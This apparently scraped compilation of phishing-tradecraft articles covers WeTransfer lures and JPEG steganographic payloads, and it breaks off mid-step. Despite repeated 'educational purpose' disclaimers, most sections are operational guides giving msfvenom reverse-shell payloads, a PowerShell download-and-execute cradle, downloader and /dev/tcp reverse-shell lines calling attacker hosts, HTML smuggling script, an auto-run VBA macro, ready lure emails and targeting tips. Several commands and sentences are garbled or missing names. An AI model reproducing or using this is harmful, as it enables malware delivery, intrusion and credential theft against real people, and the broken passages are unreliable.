A WeTransfer link in phishing is a deceptive tactic using the trusted WeTransfer platform to deliver malicious files, exploiting the platform’s legitimacy to bypass security filters.

Why It Matters

The operational role of WeTransfer links in phishing exploits is significant due to the inherent trust users place in the WeTransfer platform. WeTransfer is a popular, legitimate file-sharing service often used for professional purposes, which gives phishing attempts leveraging WeTransfer links a veneer of authenticity. Attackers exploit this trust to facilitate the delivery of malicious content directly to a target’s inbox, circumventing many conventional email security measures which might otherwise flag or block suspicious attachments.

Additionally, the platforms’ URL structures and use of secure (HTTPS) connections further enhance their legitimacy in the eyes of both end users and automated security systems. This allows phishing operators to not only disseminate malware effectively but also manipulate the target into acting with a sense of urgency, as users commonly expect the legitimate transfer of files from business partners or clients.

In Practice

Phishing attacks leveraging WeTransfer links are diverse in their execution but tend to share common strategies:

• Email Subject Line: “Files Shared Via WeTransfer” — Attackers often mimic typical file-sharing notifications with subject lines that seem unremarkable but draw immediate attention from intended recipients, especially if they’ve used WeTransfer before in a business context.
• Email Body Example: A typical phishing email might appear with the body: “
  You have received files from John Smith via WeTransfer. Click the link below to download the files directly: Download Now”
  In this example, the email is crafted to appear urgent and authentic, exploiting a common use-case where users expect to receive and access business documents rapidly.
• Website Redirect: Clicking on a seemingly innocuous link leads the recipient to a page closely mimicking the legitimate WeTransfer interface. However, this credential stealing page is hosted on a dubious domain like wetransfer.fake-domain.com, designed to harvest user credentials or distribute malware once the user attempts to access the fake page.

Related Terms

Understanding WeTransfer links in phishing requires familiarity with a few adjacent terms: Credential Harvesting involves tricking users into submitting their login details to a malicious actor. Malware Delivery occurs when malicious software is sent to a target for the purpose of infiltration or exploitation. Social Engineering is the broader practice of manipulating individuals into disclosing confidential information, part of which includes tactics used in WeTransfer phishing scams.

References

• SANS Internet Storm Center — WeTransfer Used for Phishing
• Tripwire — Why Threat Actors Use WeTransfer for Phishing

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

We’ll delve into earth-tested methods like polymorphic malware, which continually changes to elude detection, as well as fileless attacks and steganography. Learning these evasion tactics will enhance your ability to execute high-yield phishing attacks, exposing genuine human and system vulnerabilities. After reading, you’ll be prepared to execute and analyze methods that simulate highly advanced threats, pushing the boundaries of phishing realism.

Prerequisites and Setup

Before executing sophisticated evasion techniques, ensure you have the right tools and a prepared environment. An optimized setup will include an email campaign management tool such as GoPhish, a steganography tool like OpenStego, and a malware framework such as Metasploit for generating polymorphic payloads. Prepare environments on isolated virtual machines or containers to avoid unintended network interactions.

First, install GoPhish for managing your phishing campaigns. Follow these command-line steps on a Linux environment:

sudo apt update

sudo apt install gophish

This installs GoPhish, a tool crucial for campaign management. Next, you’ll need to configure your SMTP settings for sending emails:

nano /etc/gophish/config.json

In this file, set your SMTP relay host, port number, and authentication credentials. This ensures your emails can bypass primitive spam filters through a legitimate relay, enhancing delivery rates.

For generating polymorphic malware, install Metasploit on your system:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/Gemfile.local

Execute this script to install Metasploit, enabling malware crafting capabilities. These tools will lay the foundation for your evasion-focused phishing campaigns by facilitating payload delivery and execution.

Step-by-Step Execution

Bypassing Security Software with Polymorphic Malware

To execute polymorphic malware, leverage Metasploit’s encoders. This technique renders each payload unique, hindering signature-based detection systems:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o payload.exe

This Metasploit command generates a polymorphic payload. The shikata_ga_nai encoder rerolls the payload encryption five times, altering its hash and appearance, allowing it to dodge malware scanners typically keyed to recognize static patterns.

Fileless Malware Delivery

Fileless malware attacks minimize footprint by executing directly in memory, leveraging legitimate software to perform malicious actions. Use PowerShell for this technique:

powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/script.ps1')"

This command downloads and executes a malicious PowerShell script directly from memory, a critical fileless technique. By avoiding disk writes, it bypasses many endpoint protection systems configured only to scan file I/O operations.

Steganography for Evading Detection

Steganography involves hiding data within other files, such as images, to skirt detection. Here’s how to embed a payload within an image:

steghide embed -ef malware.exe -cf innocent-image.jpg -p password123 -sf infected-image.jpg

This command embeds malware inside

, creating

. The process evades detection by concealing binary data within apparently benign media, slipping past filters scanning file types instead of content integrity.

Advanced Variations

Dynamic DNS with Subdomain Spoofing

To increase stealth, consider using dynamic DNS setups with spoofed subdomains. An attack might involve routing traffic through a domain like

, convincing targets that the redirected URL is legitimate. Use DynDNS services to dynamically update subdomains associated with phishing pages, maintaining control without revealing static IP ownership.

Dynamic DNS uses real-time subdomain updates, a stealthier URL management technique in phishing campaigns.

MFA Bypass via Social Engineering

Advanced phishing attacks might employ social engineering to gather one-time passwords, simulating an MFA flow. An email purporting to be from IT may request targets for a “security check,” directing them to enter recent OTPs for verification:

Subject: Urgent: Confirm Your Account Security

An email would explain increased security measures, followed by a mock IT portal requesting recent OTP entries. This technique baits victims into supplying legitimate data, which can be immediately used to gain access.

Good / Better / Best

Good: Crafting emails that merely adjust email send time to bypass basic spam filters. Example: Sending phishing emails during off-peak hours when cybersecurity analysts are less likely to monitor traffic realtime.

Better: Using language carefully mimicking common internal communications to match workplace vernacular. Example plan: Strategically mimicking IT department tones, offering remote troubleshooting links.

Best: Enacting behavioral insights of specific targets, executing hyper-real campaigns that imitate ongoing legitimate projects. Example: Simulating company project emails with correct internal jargon and current project identifiers, blending seamlessly with legitimate work correspondence and requiring very skilled filtration to discern real from fake.

Related Concepts

To further enhance phishing delivery, explore spam filter evasion through SPF, DKIM, and DMARC exploitation. Understanding subtle but potent techniques regarding email authentication mechanisms provide a tactical edge when aiming to bypass systemic filters. Additionally, URL reputation assessment evasion can leverage domain aging strategies, letting attackers use new domains without triggering reputational alarms.

References

• SANS Institute: Polymorphic Malware Techniques
• Black Hills Infosec: Bypassing Multi-factor Authentication
• Cybereason: Steganography Threat Analysis

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

After reading this article, you’ll be equipped to craft phishing campaigns that effectively deploy payloads while evading standard security checks. We’ll dissect tools and techniques to embed payloads in unsuspecting mediums, ensuring your simulations mimic real-world threat sophistication.

Prerequisites and Setup

To begin crafting advanced payload delivery methods, you’ll need to assemble a toolkit comprising several key components. Start with Steganography tools like Steghide or OpenStego for embedding payloads into images. Installation is straightforward: use package managers like

or

depending on your operating system. For instance:

sudo apt-get install steghide

This command installs Steghide on a Debian-based system, a tool you’ll use to conceal payloads within images.

Additionally, download and configure GoPhish, an open-source phishing toolkit. Ensure you are working from an environment that mimics targets’ common setups. This could include configuring firewall settings and using virtual private networks (VPNs) to safely test these methods. Finally, establish domain infrastructure that supports phishing engagements. This means setting up domains that blend seamlessly into legitimate communications — such as subdomains tied to real brands, like

. This setup requires initial technical proficiency, ensuring the environment is secure and isolated for testing.

Step-by-Step Execution

Embedding Payloads in JPEGs

Creating the Payload

Begin by crafting your payload script that you wish to embed within the JPEG. Ensure the payload is executable and not easily detectable by antivirus solutions. A simple example might use PowerShell or Python scripts designed for reverse shells or data exfiltration.

echo "Invoke-WebRequest -Uri 'http://evil-server.com/payload.exe' -OutFile 'C:\\Users\\Public\\payload.exe'" > payload.ps1

This PowerShell script, a simple downloader, retrieves a malicious executable from a remote server.

Embedding the Payload

Next, use Steghide to embed this script into a JPEG:

steghide embed -cf company_pic.jpg -ef payload.ps1 -sf steg_company_pic.jpg

Here, the payload is embedded into a company image, creating

. This file appears to be a normal JPEG while hiding your script effectively.

Creating the Trap

Incorporate the JPEG into an email that masks the intent through legitimate context:

Subject: Urgent: Please review the attached company policy updates

Dear Team,



We are updating our company policies this quarter. Please review the attached document at your earliest convenience. Feel free to reach out if you have any questions.



Best,  

IT Department

This email invites users to open the JPEG under the guise of reviewing policy updates, a contextually believable lure for employees and security teams alike.

Leveraging WeTransfer for Delivery

Crafting the Delivery

Using WeTransfer, a platform widely used for large file sharing, you can easily deliver payloads under the cover of legitimate file transfers. Begin by preparing a ZIP file containing all necessary payloads.

zip -r company_updates.zip payload.ps1 additional_file.txt

This ZIP archive combines payloads with benign documents, increasing the credibility of the bundle.

Uploading and Distributing

Upload this archive to WeTransfer and compose an enticing email:

Subject: Project Files for Immediate Review

Hello,



As discussed in our recent meeting, I am sending over the files necessary for the new project. These should include all you'd need for the review. 



Access them via WeTransfer: [Download Link]



Thank you,

Project Manager

The appeal here lies in the familiar, often-used

link that users associate with legitimate workspace activity.

Advanced Variations

HTML Smuggling

HTML smuggling is a newer variation that involves concealing a malicious payload within a webpage itself. This technique circumvents traditional scanning by downloading the malicious content directly on user interactions. Here’s a basic implementation:

<script>

var a = new Blob(["Payload Content"], {type: "application/octet-stream"});

var url = window.URL.createObjectURL(a);

var x = document.createElement("a");

x.href = url;

x.download = "payload.exe";

document.body.appendChild(x);

x.click();

</script>

This script is part of an HTML email. When opened in a browser, it triggers the

download locally, bypassing sequential traffic scanning and leveraging user authentication to initiate the download.

Macro-Enabled Documents via OneDrive

Utilizing OneDrive or Google Drive, macro-enabled documents can be distributed with ease. A crafted Excel or Word document containing a VBA macro can launch payloads upon a file open event. Here is a sample VBA script:

Sub Auto_Open()

    Dim objShell As Object

    Set objShell = CreateObject("WScript.Shell")

    objShell.Run "powershell -Command ""Invoke-WebRequest -Uri 'http://remote-site.com/evil.exe' -OutFile 'C:\\temp\\evil.exe'; Start-Process 'C:\\temp\\evil.exe'""

End Sub

Place this macro inside a document hosted on a trusted platform like OneDrive, and share the link claiming the document contains important figures or presentations.

Do’s and Don’ts

• Do test your payloads in sandbox environments to ensure they function without immediate signature detection. For example, always validate the execution of a
  payload.exe

  inside isolated VMs mimicking target configurations.

• Don’t rely solely on known techniques. Continuously evolve to incorporate newer evasion strategies. Repeated techniques can lead to rapid domain blacklisting.
• Do leverage legitimate domain infrastructure. Use domains like
  secure-mail.microsoft.com

  to bypass attention, ensuring MX records are correctly configured to mimic real correspondence patterns.

• Don’t ignore email templating and language nuances. Precision in crafting lures with linguistic accuracy increases your campaign’s credibility and reduces suspicion among users.

Related Concepts

For practitioners exploring deeper into the realm of evasive payloads, it is beneficial to examine techniques such as Beacon Object Files used in Cobalt Strike to load shellcode directly into memory. Another related area to delve into is Malicious Document Distribution using Remote Template Injection, which also shares attributes with document-based exploits but involves dynamically loading content from remote servers to circumvent traditional static analysis.

References

• Embedding Payloads Within Images and Documents
• Steghide Documentation
• GoPhish Project

Related Reading

• Techniques for Embedding Payloads in Image Files for Phishing
• Leveraging Image-Based Payload Delivery in Phishing Campaigns
• Mastering Phishing Payload Delivery: Techniques and Strategies
• Analyzing Payload Delivery Techniques in Phishing Campaigns

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

Campaign or TTP Overview

The observed phishing campaigns leverage malicious JPEG files purportedly containing MSI installers. This approach blends social engineering and technical obfuscation to deceive targets. Typically, recipients receive a seemingly benign email that directs them to download a file via WeTransfer. This download includes a JPEG image, which upon further inspection, houses an embedded MSI installer designed to execute malicious code once deployed. The pioneering aspect of this campaign is its use of legitimate file-sharing services, lending an unwarranted authentication veneer that lulls targets into a false sense of security.

These campaigns have primarily targeted industries with prevalent digital workflows—tech firms, financial services, and educational institutions. The campaigns achieve high levels of interaction due to the familiarity and authenticity associated with WeTransfer. Notably, the attackers capitalize on cloud-based file-sharing services to navigate through organizational email filters, delivering payloads under the radar.

How It Was Built

The technical anatomy of this campaign is as sophisticated as it is simple. Attackers use the WeTransfer service to send an email to potential victims, containing a download link for a file labeled as a report, invoice, or presentation. This file is in fact a compressed archive with a JPEG file inside.

Subject: Project Documentation - Fall 2023

From: notifications@wetransfer.com

Download Link: hxxps://wetransfer[.]com/downloads/abcdef123456

The JPEG image is not just an image; rather, it has the MSI installer embedded in its metadata. Upon downloading the file, users are instructed to “view” it using specific tools, under the guise of needing the report in a specific format. Once executed, the MSI deploys malware designed to exfiltrate data or initiate further downloads of more malicious components. The effectiveness stems from the clever construction of an innocent-looking JPEG, masking a harmful MSI loader.

Why It Worked

The choice of WeTransfer was strategic, leveraging the platform’s widespread legitimacy and trusted status, allowing phishing emails to bypass filtering mechanisms. This approach exploits the recipient’s perception that files received from WeTransfer are unlikely to be harmful.

Additionally, the use of MSI-branded JPEGs is a novel evolution of the classic steganography tactic. By embedding MSI installers within an image file format commonly shared across professional networks, attackers effectively conceal their payload in plain sight. This subtlety is compounded by social engineering that speaks directly to the recipient’s professional expectations—downloading and handling reports or presentations is a daily routine for the target demographic.

The blending of these tactics results in a scheme that not only delivers its payload but also engages and entices the recipient to act on the download, an element further underscored by professionally phrased email text that mimics standard corporate communication.

Operator Takeaways

Red teamers can draw several lessons from this resurgence of tactics. Firstly, the leveraging of legitimate platforms such as WeTransfer should inform future efforts to bypass conventional security controls. The incorporation of file format misdirection, using images as transportation mediums for scripts or executables, should also be explored for creating innovative engagement strategies.

Additionally, focused social engineering that aligns with the target’s roles and responsibilities can significantly improve campaign yield. When designing simulations, consider the target’s normal workflows and tailor the delivery method and content accordingly.

Do’s and Don’ts

• Do use legitimate services to deliver your payloads. This approach enhances trust and reduces suspicion.
• Do ensure the content and context align with expected recipient behaviors. Campaigns work best when integrated into the recipient’s routine tasks.
• Don’t overlook the importance of the email’s linguistic quality. Errors in grammar or syntax can break the illusion.
• Don’t rely solely on one method. Blending different tactics (e.g., social engineering and technical evasion) enhances overall effectiveness.

References

• WeTransfer-based phishing leveraging MSI-branded JPEG payloads
• Malware Traffic Analysis

Related Reading

• What is a JPEG Payload in Phishing?
• Techniques for Embedding Payloads in Image Files for Phishing
• Leveraging Image-Based Payload Delivery in Phishing Campaigns
• Advanced Techniques in Payload Delivery for Phishing Campaigns

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

JPEG Payload: A technique where malicious content is embedded within JPEG image files to facilitate delivery of malware without immediate detection by security systems.

Why It Matters

The significance of JPEG payloads in phishing arises from their ability to circumvent traditional security measures. Many systems automatically trust image files and focus on scrutinizing executables or documents with macros. This level of trust facilitates a higher success rate for attackers as the payloads are hidden in plain sight. The unsuspecting target often perceives an image as innocuous, thus enhancing the likelihood of interaction.

Operators leverage JPEG payloads to bypass security layers like email filters, which may not be configured to analyze the content of image files in-depth. Given their pervasive role in communication and document sharing, leveraging JPEGs as a delivery vector taps into a ubiquitous format that’s unlikely to arouse suspicion on first glance.

In Practice

A classic manifestation of a JPEG payload in phishing involves embedding a malicious script within the metadata of the JPEG file. For instance, the Evil MSI background technique showcases how attackers can compose a sophisticated threat vector by placing executable code in the form of a popular image format. An example might use a subject line “Invoice Attached (JPEG)” convincing targets in finance departments to open and subsequently execute hidden malware.

Subject: Your Recent Purchase Invoice Attached

From: transactions@trustedcommerce.com

Attachment: invoice12345.jpg

In some documented cases, attackers have utilized steganography to conceal command and control channels within JPEGs, where the image itself acts as a conduit to maintain persistent communication with a system. One such campaign masqueraded as a “Special Offer!” email campaign where the body text lured recipients into viewing an image attachment claiming to have exclusive discounts.

Subject: Get exclusive discounts on your favorite brands!

From: sales@exclusiveoffers.com

Attachment: discount_image.jpg

Another technique involves crafting spear-phishing scenarios where highly personalized JPEG images are sent to the victim. The images appear as routine business documents but are in fact carefully designed to contain embedded exploits aimed at exploiting known vulnerabilities in software that renders the image.

Related Terms

Understanding JPEG payloads is crucial but context deepens with familiarity of related concepts. Phishing itself broadly encompasses varied techniques including the use of malicious macros often found in document formats like Word or Excel. Similarly, steganography, which refers to the practice of hiding data within files, is a relevant technique that’s often used alongside JPEG payloads.

References

JPEG Payload Resurgence Using Evil MSI

Wordfence on Payload Workings in Cyber Attacks

Related Reading

• Techniques for Embedding Payloads in Image Files for Phishing
• Leveraging Image-Based Payload Delivery in Phishing Campaigns
• The Return of MSI-Branded JPEG Payloads in Phishing Campaigns
• Exploiting JPEG Payloads: The Return of Evil MSI Background

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

The key to a successful payload embedding strategy is subtlety coupled with technical proficiency. The difference between a detectable attempt and a successful one often lies in the execution’s realism and the invisibility of the underlying malicious intent. As you read on, you will learn how to craft these sophisticated payloads, ensuring they blend seamlessly with legitimate traffic, maximizing engagement rates in your simulations.

Prerequisites and Setup

To execute an effective phishing campaign using image-encapsulated payloads, you need a carefully curated toolkit and robust foundational setup. First, you need software capable of manipulating image files—tools like ImageMagick or GIMP. These tools offer extensive capabilities for steganography and image processing, essential for concealing payloads within images. Additionally, ensure you have Stegosploit, a tool designed for embedding exploits within image files. You’ll also require access to a controlled environment where you can test the payloads without exposing them to legitimate networks.

Next, install the necessary libraries and dependencies. For instance, if you’re using ImageMagick, ensure it’s properly installed by checking its version:

convert --version

This command verifies that ImageMagick is correctly set up, displaying the current version number if installed properly.

For a full-featured development environment, consider setting up a virtual machine preloaded with essential tools and configured with network isolation to prevent accidental spread of malicious content. You’ll also need a phishing framework like GoPhish to manage the distribution of your payload-embedded images, allowing for detailed logging and analysis of user interactions.

Step-by-Step Execution

Step 1: Creating the Encoded Payload

Step 1.1: Craft the Malicious Payload

Your initial task is to create a payload that will execute the intended action when extracted from the image. This payload could be a reverse shell, an executable, or any command capable of providing access or exfiltrating data. Let’s say you choose a simple reverse shell script written in Bash:

#!/bin/bash

/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1

This script initiates a reverse shell connection to a specified IP address and port. Save this script as

.

Step 1.2: Convert the Payload to Base64

To hide the payload within an image, convert it to a Base64 string:

base64 payload.sh > encoded_payload.b64

This produces a Base64-encoded version of your script, ensuring it fits well within an image file’s metadata without breaking the file’s structure.

Step 2: Embedding the Payload in an Image

Step 2.1: Choose the Cover Image

Select a cover image that appears authentic and innocuous—such as a company logo or a stock photo relevant to your campaign theme. Let’s assume you choose an image named

. The image must be large enough to house the encoded payload without visibly distorting its appearance.

Step 2.2: Embed the Encoded Payload

Using ImageMagick, append the Base64 payload to the image’s end without modifying its visible properties:

convert cover_image.jpg  -comment @encoded_payload.b64 stego_image.jpg

This command adds the Base64-encoded payload to the image as a comment, creating

with the payload embedded invisibly.

Step 3: Deploying the Image

Step 3.1: Craft the Phishing Email

Compose an email with a realistic subject line and body to entice the recipient into interacting with the image. An example email might look like this:

Subject: Congratulations! You've Been Selected as Employee of the Month



Dear [Employee],



Congratulations! You have been selected as the Employee of the Month. As a token of appreciation, please find the attached image illustrating your accomplishments at yesterday's company meeting.



Best Regards,

[Your Organization's Name] Rewards Team

Ensure the email directs the recipient to download and view the image.

Step 3.2: Track Interactions

Use a tool like GoPhish to send the phishing emails and track which users open the image. This feedback provides valuable insights into user susceptibility and the effectiveness of the payload delivery.

Advanced Variations

Once you have mastered the basic technique, consider these advanced variations to increase attack efficacy:

Using HTML5 Canvas for Rendering

Instead of embedding the payload directly in an image file, leverage HTML5’s Canvas API to render images within a browser from dynamically loaded payload data. Construct a web page that fetches the Base64 payload and decodes it client-side, drawing it onto a canvas element. This method facilitates payload activation within the browser environment, bypassing traditional download-and-execute scenarios.

<canvas id="stegoCanvas" width="500" height="500"></canvas>

<script>

    var canvas = document.getElementById('stegoCanvas');

    var context = canvas.getContext('2d');

    var image = new Image();

    image.onload = function() {

        context.drawImage(image, 0, 0);

    };

    image.src = 'data:image/jpeg;base64,[Base64 Payload]';

</script>

This HTML snippet loads an image from a Base64 string, increasing your attack complexity and success chance.

Obfuscating Payloads with Custom Encoding

Develop custom encoding schemes beyond Base64 to hide your payload’s true nature and avoid detection by security systems. This could involve using XOR encryption or AES to add another layer of obfuscation, rendering the payload only decipherable with the correct decryption key.

echo -n 'payload' | openssl enc -aes-256-cbc -a -nosalt -pbkdf2 -pass pass:secretpassword

This command encrypts your payload with AES, creating an encoded string that only you can decipher—decreasing the risk of detection by automated systems.

Good / Better / Best

Good: Simply embedding a Base64-encoded payload in a comment section of an image file using ImageMagick. Although this method works, it’s more susceptible to detection due to the straightforward encoding method.

convert simple.jpg -comment @plain_payload.b64 encoded_simple.jpg

Better: Incorporating a known image manipulation tool like GIMP to hide payload data in various image file metadata fields, thus evading initial automated detection attempts.

# Steps taken in GIMP:

# 1. Open the image file and navigate to Image Properties.

# 2. Edit IPTC data to include encoded payload in less obvious fields.

# 3. Save and exit.

Best: Utilizing custom developed encoding and stegano solutions which employ multiple levels of encryption and data segmentation, making the payload discovery an uphill task even for advanced analysts, blending with a scripted HTML Canvas execution for remote activation.

<canvas id="bestCanvas" width="800" height="600"></canvas>

<script>

    // Placeholder for custom decoding logic and canvas drawing

</script>

Using these increasingly complex methods ensures the payload not only reaches its target but does so in a manner difficult to detect and investigate.

Related Concepts

Payload delivery through image files ties into broader themes of social engineering and obfuscation techniques in offensive security. Understanding phishing landscape dynamics, HTML smuggling, and multistage delivery chains provides a holistic view of advanced payload dissemination strategies. By mastering these aspects, you’ll enhance your red teaming effectiveness, continually staying ahead of evolving threat landscapes. Exploring security awareness strategies also empowers you to anticipate user reactions and adjust your tactics accordingly.

References

• G-Image and Payload Embedding Techniques
• ImageMagick
• GoPhish

Related Reading

• Leveraging Image-Based Payload Delivery in Phishing Campaigns
• Advanced Techniques in Payload Delivery for Phishing Campaigns
• What is a JPEG Payload in Phishing?
• The Return of MSI-Branded JPEG Payloads in Phishing Campaigns

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

Campaign or TTP Overview

In this latest campaign resurgence, threat actors have leveraged WeTransfer links in phishing emails to distribute JPEG images carrying malicious payloads. These campaigns have historically targeted corporate environments, notably industries where the transfer of large media files is routine, and they have recently been spotted targeting entities in the finance and communication sectors.

The attack, observed in late 2023, begins with an email purporting to be a legitimate file transfer notification from WeTransfer, a service many organizations have come to trust. The sender often uses cleverly spoofed email addresses that mimic internal or partner communications. The payload disguised as a benign image is hosted on WeTransfer, a decision that benefits from both the brand’s trustworthiness and its lack of immediate scrutiny in email filtering systems.

Attribution for these campaigns remains difficult, as the attackers utilize common tactics and tools available to multiple threat actors. However, the sophistication of the email construction and the specific targeting of executive personnel suggest a well-coordinated effort, potentially by a group with prior experience in corporate espionage.

How It Was Built

The technical underpinnings of this campaign are both clever and insidious. The initial stage begins with an email crafted to mimic a legitimate WeTransfer notification. A typical subject line might read: [WeTransfer] – You’ve received a secure file from Jane Doe. The sender address could appear as notifications@wetransfer-notify.com, subtly differing from the actual service domain.

The hyperlink included in the email does not direct the victim to a fake phishing site but rather to a genuine WeTransfer page where the payload is hosted. This method capitalizes on trust in third-party services, reducing suspicion that might arise from a direct foreign URL.

URL: https://wetransfer.com/downloads/fake_payload_in_Appearance.jpg [JPEG with embedded MSI]

The JPEG itself is the lure: upon inspection or attempted execution due to curiosity or compliance with a perceived request, the file attempts to load a malicious MSI package. Embedded through steganographic techniques, the MOSI payload runs scripts to download additional malware or execute credential-harvesting operations, depending on the attack vector’s final goal.

Why It Worked

Several factors contribute to the campaign’s effectiveness, beginning with the well-chosen framing of trusted services. By leveraging known platforms like WeTransfer, attackers exploit a pre-existing trust relationship and sidestep initial scrutiny. This approach is particularly potent against users conditioned to expect such alerts as part of their daily workflow.

The visual components of the phishing emails — from the spoofed domain to the polished layout — mimic authentic correspondence, adding a layer of credibility that’s challenging to resist at first glance. Additionally, the choice of JPEGs as carriers plays into users’ expectations; most users associate JPEGs with safe, non-executable content, a misconception that this technique exploitatively leverages.

The final touchpoint of effectiveness lies in targeting individuals with access to valuable information or system control, increasing the campaign’s impact potential with each successful compromise. By impersonating WeTransfer, the attackers eliminate the need for creating a convincing phishing site, which significantly decreases complexity while maintaining a high success rate.

Operator Takeaways

For red teamers, the Evil MSI Background campaign provides several key insights for simulating similar attack scenarios. First, capitalizing on existing trusted platforms to host malicious payloads can significantly raise the efficacy of a phishing campaign by reducing suspicion. When crafting scenarios, consider how leveraging commonly trusted SaaS platforms in your phishing simulations can augment their realism and effectiveness.

Additionally, meticulous attention to the aesthetic details of spoofed communications increases the likelihood of user interaction. Ensure that your emails closely mimic authentic internal communications or expected external correspondence. Lastly, targeting strategies should prioritize those with high levels of access within an organization to maximize the potential compromise footprint.

Do’s and Don’ts

• Do use real-world domains and brands already known to your target — the more familiar, the more effective.
• Don’t rely solely on email body copy — consider how the email’s visual elements contribute to legitimacy and trust.
• Do target users less likely to question trusted services, thereby increasing the likelihood of payload deployment and execution.
• Don’t use generic sender patterns or subject lines — these can easily be detected by automated filtering systems.

References

Analysis by SANS Internet Storm Center

Proofpoint Analysis on WeTransfer Threats

Related Reading

• Leveraging Image-Based Payload Delivery in Phishing Campaigns
• Understanding CAPTCHA Bypass Techniques in Phishing
• Integrating Vulnerability Exploitation into Phishing Campaigns
• What is Privilege Escalation in the Context of Phishing?

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

A JPEG Payload involves embedding executable code inside a JPEG image file to deliver malware through phishing attacks.

Why It Matters

JPEG payloads represent a creative synthesis of social engineering and technical exploitation. Attackers exploit the trust inherent in ubiquitous and innocuous file types, such as JPEG images, to bypass victim suspicion and technical defenses alike. JPEG payloads often surface in phishing campaigns where the attacker’s objective is to either deliver a malware dropper or facilitate an initial compromise to establish a foothold. The subtleness of this method often aligns perfectly with broader campaign strategies aimed at establishing persistence and harvesting sensitive information without raising the victim’s alarm.

Operators encounter JPEG payloads primarily during the delivery phase of a phishing attack, where a seemingly benign image file arrives attached to a phishing email. Upon opening the attachment or executing an embedded script, the malicious payload activates, exploiting vulnerabilities in the target’s system to achieve its aims. Incident responders and security analysts need to understand this tactic’s technical and social dimensions to appreciate its prevalence and potential impact within targeted campaigns.

In Practice

Consider the scenario where a phishing email reads, “Checkout our new product lineup!” with an attached JPEG file supposedly containing product images. The file,

, doesn’t contain just an image—it hides a payload. Upon opening the image in a vulnerable viewer, the embedded code within the JPEG triggers, potentially executing a script to drop a malware executable onto the user’s system.

Subject: New Season Collection – Click to Preview!

From: Marketing <newsletter@trustedbrand.marketing>

To: user@example.com



Dear Valued Customer,



We're excited to showcase our newest collection of must-have items! We've attached an exclusive preview just for you.



[Attachment: new_collection_preview.jpg]



Best Regards,

Trusted Brand Marketing Team

In another example, the SANS Internet Storm Center documents incidents where attackers used steganography to embed scripts inside JPEGs shared across social media platforms, where the images reached multiple users unaffiliated with the direct phishing email. When shared images are opened with vulnerable photo viewing applications, the JPEG payloads execute background processes to communicate with command and control servers, downloading additional malware components.

A different incident involved spear-phishing where an executive received an email with a subject line “Quarterly Report Updates,” attaching a JPEG purportedly containing data visualizations. The image file executed a PowerShell script hidden within image metadata, establishing a reverse shell connection to the attacker’s server. This allowed remote control operations without altering ordinary network traffic patterns.

Related Terms

For a deeper understanding, familiarize yourself with Steganography, which expands on concealing information within files, and Malware Droppers which detail the initial steps of deploying malware onto victim systems. Additionally, explore Phishing Attachments to learn about different file types used in similar payload delivery strategies.

References

SANS Internet Storm Center
JPEGs in Malware: Trends and Techniques

Related Reading

• Exploiting JPEG Payloads: The Return of Evil MSI Background
• Leveraging Image-Based Payload Delivery in Phishing Campaigns
• Mechanics of Payload Delivery in Phishing Campaigns
• Analyzing Payload Delivery Techniques in Phishing Campaigns

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

Understanding the nuances of image-based payload delivery not only sharpens your offensive skills but also enriches your comprehensive view of the phishing landscape. Upon reading, you will be equipped to construct advanced engagements leveraging image files, maximizing both engagement and evasion potential.

Prerequisites and Setup

To effectively deploy an image-based payload, you must have a toolkit that supports both image manipulation and payload encoding. For image processing, tools like GIMP or Photoshop enable you to subtly alter image metadata. Meanwhile, software such as Stegano or Steganography facilitates encoding. An accessible command-line tool for payload creation is Metasploit, adept at generating malicious payloads encapsulated in various formats.

Begin by installing the necessary software. For Metasploit, execute:

sudo apt-get install metasploit-framework

This installs Metasploit Framework on your system, crucial for generating payloads encapsulated in images.

To handle image conversion and manipulation, ensure you have a tool like ImageMagick:

sudo apt-get install imagemagick

ImageMagick will enable essential image manipulation and conversion tasks required for payload embedding.

You’ll need access to a controlled, isolated environment where you can safely create and test your phishing vectors. A virtual machine with networking isolated or a test cloud instance within Amazon Web Services or Google Cloud Platform proves useful.

Lastly, you’ll require an email service capable of bypassing basic spam filters for sending crafted emails. Services like GoPhish or even manual configurations using SMTP relay servers can prove useful. Establish domain credibility by configuring SPF, DKIM, and DMARC; verify DNS settings using:

dig txt domain.com

This command checks DNS records for verification purposes prior to launching campaigns.

Step-by-Step Execution

Set Up the Malicious Payload

• Begin by creating a payload with Metasploit configured for reverse TCP shell access:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > payload.exe

This creates a Windows executable payload that connects back to your specified IP and port once executed.

• Encode the payload within an image:

steghide embed -cf innocent.jpg -ef payload.exe -p your_password

Utilizing steghide, this command embeds the executable within an image, shielded by a password. The result is an image that appears legitimate but houses the payload.

• Verify the integrity and undetectability of the image:

file innocent.jpg

Ensure the file type remains unchanged after embedding. This command cross-verifies the output file’s metadata for unexpected changes.

Craft Phishing Email with Image

• Create an email with a compelling subject line and body:

Subject: Important Update Needed: Action Required



Dear Specific User,



We have implemented a mandatory update to enhance your security. Please review the <mark style="background-color:#9EF9FD;color:#000000" class="has-inline-color">attached document</mark> at your earliest convenience to ensure compliance.



Thank you,



IT Support Team

The crafted email includes a psychologically persuasive subject and body text that prompt action without raising suspicion.

• Attach the image file to the email:

Ensure your email client or sending interface attaches the file embedded with the payload, maintaining its perceived authenticity.

• Send the email through a tested SMTP relay:

sendmail -t < emailcontent.txt

Using the terminal, send the crafted email. Ensure the content and headers align with normal corporate-sounding communiqués to improve concealment.

Ensure Payload Execution

• Monitor for execution:

